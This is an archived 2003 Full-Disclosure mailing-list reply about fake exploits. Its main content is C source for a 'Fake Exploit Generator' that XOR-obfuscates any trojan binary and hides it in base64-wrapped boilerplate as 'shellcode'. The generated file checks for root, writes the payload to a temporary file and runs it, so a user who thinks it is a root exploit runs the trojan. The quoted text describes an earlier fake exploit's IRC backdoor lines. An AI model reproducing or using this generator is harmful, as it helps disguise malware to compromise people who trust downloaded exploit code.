[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <200306132239.03885.gml@phrick.net>
From: gml at phrick.net (gml)
Subject: Re: -1 day exploit - Warning
On Friday 13 June 2003 06:51 pm, David Bernick wrote:
Well anyway, I got inspired:
// Fake Exploit Generator
// gml@...ick.net
//
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))
#define BEAUTIFY "indent"
char b64string[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static char header[] = {
"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K"
};
static char body[] = {
"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K"
};
long b64dec (char *to, char *from, unsigned int len)
{
char *fromp = from;
char *top = to;
char *p;
unsigned char cbyte;
unsigned char obyte;
int padding = 0;
for (; len >= 4; len -= 4) {
if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = (p - b64string);
}
obyte = cbyte << 2; /* 1111 1100 */
if ((cbyte = *fromp++) == '=') cbyte = 0;
else {
if (badchar(cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte >> 4; /* 0000 0011 */
*top++ = obyte;
obyte = cbyte << 4; /* 1111 0000 */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte >> 2; /* 0000 1111 */
*top++ = obyte;
obyte = cbyte << 6; /* 1100 0000 */
if ((cbyte = *fromp++) == '=') { cbyte = 0; padding++; }
else {
padding = 0;
if (badchar (cbyte, p)) return -1;
cbyte = p - b64string;
}
obyte |= cbyte; /* 0011 1111 */
*top++ = obyte;
}
*top = 0;
if (len) return -1;
return (top - to) - padding;
}
void printhex(char c, FILE *fp)
{
char s[10];
if(c < 16 && c >= 0)
{
fprintf(fp, "\\x%2.2x", c);
}
else
{
if(c > 0)
{
fprintf(fp, "\\x%2.2x", c);
}
else
{
sprintf(s, "%x", c);
fprintf(fp, "\\x%c", s[6]);
fprintf(fp, "%c", s[7]);
}
}
}
int main(int argc, char *argv[])
{
FILE *trojan;
FILE *fakeexp;
char byte[0];
int count = 0;
char *out;
out = (char *)malloc(sizeof(body));
memset(out, 0, sizeof(out));
#ifdef BEAUTIFY
char *cmd;
#endif
if(argc < 4 )
{
printf("usage: %s trojan fakeexp.c key\n", argv[0]);
printf("ex: %s trojan fakeexp.c 187\n", argv[0]);
exit(0);
}
trojan = fopen(argv[1], "r");
fakeexp = fopen(argv[2], "w");
if(trojan && fakeexp)
{
b64dec(out, header, sizeof(header));
fprintf(fakeexp, "%s", out);
memset(out, 0, sizeof(out));
fprintf(fakeexp, "\n#define MAX\t%s\n\n", argv[3]);
fprintf(fakeexp, "static char shellcode[] = {\n");
while(!feof(trojan))
{
memset(byte, 0, sizeof(byte));
fread(byte, 1, 1, trojan);
byte[0] = byte[0] ^ atoi(argv[3]); // obfuscate
if(count < 15)
{
if(count == 0)
{
fprintf(fakeexp, "\"");
}
printhex(byte[0], fakeexp);
count++;
}
else
{
printhex(byte[0], fakeexp);
fprintf(fakeexp, "\"\n");
count = 0;
}
}
fprintf(fakeexp, "\"\n};\n\n");
b64dec(out, body, sizeof(body));
fprintf(fakeexp, "%s", out);
memset(out, 0, sizeof(out));
fclose(trojan);
fclose(fakeexp);
}
#ifdef BEAUTIFY
cmd = (char *)malloc(sizeof(BEAUTIFY) * sizeof(argv[2]) + 2);
memset(cmd, 0, sizeof(cmd));
sprintf(cmd, "%s %s", BEAUTIFY, argv[2]);
system(cmd);
free(cmd);
#endif
}
> > Wow, I'd never run something that had a printf statement in it with
> >
> > print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake
> > 0day exp loit. v2\nPRIVMSG $chan :to run commands on me, type:
> > ".$nick.": command\n";
> >
> > if you run this you deserve to get owned. this guy could have at least
> > xor'd the strings and base64 encoded them or SOMETHING.
>
> the printf statement is in the shellcode. if you don't know C and/or hex
> very well it looks semi-legit. The attached perl code is the decoded shell
> code, it's not in the actual "exploit". This is the perfect kind of
> program to trojan little hacker wannabes on IRC.
>
> and no one deserves to be owned. They just need to pay for highly paid
> security consultants instead (shhh..kidding).
>
> d
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists